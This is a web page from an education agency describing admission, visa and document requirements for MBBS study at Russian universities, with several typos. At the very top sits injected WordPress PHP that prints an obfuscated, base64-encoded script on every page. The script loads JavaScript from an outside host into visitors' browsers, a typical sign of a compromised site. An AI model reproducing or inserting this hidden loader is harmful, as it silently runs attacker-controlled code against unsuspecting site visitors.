function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); MBBS – North Western Education Service


(Bachelor of Medicine and Bachelor of Surgery)

Enrol Yourself After 10+2


    Admission Procedure For Russian Universities

    Before applying to any University the student who desire to get higher education in Russia are advised to get all the information regarding the various options available in Russia.

    An application form is to be filled by the student for applying to the desired University.

    • Application Form
    • Copy of your passport (pages with the photo, date of birth and passport expiry date)
    • Certificate of complete higher secondary education with academic transcript for undergraduate programs / higher education degree with academic transcript for postgraduate programs.

    An admission letter will be received from the University after application has been accepted,confirming the reservation of a seat for the student at the University and in certain cases the invoice to remit the fees.

    After Confirmation of admission by the University, the Department of Federal Migration Service of the Russian Federation starts the process of issuing the official “invitation letter for study” (according to the application submitted by the university). It takes the Department of Federal Migration Service of the Russian Federal approximately 35 to 45 days to issue the official invitation letter for study.

    Upon receiving the “invition letter for study”, the student should approach to the Embassy/General Consulate of the Russian Federation in his / her country in order to apply for a student visa. Usually the following documents are required:

    • Valid Passport
    • Duly completd and signed visa application form
    • Two passport size identical photos 35 mm x 45 mm with white background.
    • Visa support letter from university or college and copy of admission letter from the university of college
    • Aids certificate (HIV test)

    After receiving the stamped visa the student can prepare himself to depart to Russia prior to one month from the expiring date.

    In line with the requirements for higher studies in any foreign country, Russia has also made it mandatory for international students to get their educational testimonials suitably Apostiled and attested in their home country.

    • Passport(valid for not less than 2 years)
    • Student entry visa
    • Immigration Card(supplied during the flight or at the airport;it must be completed by the student and stamped by customs in the airport right after arrival in Russia).
    • Medical health certificate including chest X-Ray result.
    • Negative AIDS test result
    • 12 passport size (3×4 cm) black and white photographs in matt finish.

    As the seats are limited in any University the allotment is done strictly on a first come first served basis,subject to the final decision of the University/Academy and the marks obtained in the 12th standard (in case of the MBBS student) and the passing of the degree course along with the completion of the internship for the post graduate students.

    As per an order issued by the Ministry of Education and Science of the Russian Federation, aqll international students intending to pursue higher education in Russia are required to obtain a Certificate of Equivalency of their prior educational documents. The Ministry of Education and Science of the Russian Federtion issues this certificate after examination of a student’s prior educational certificates.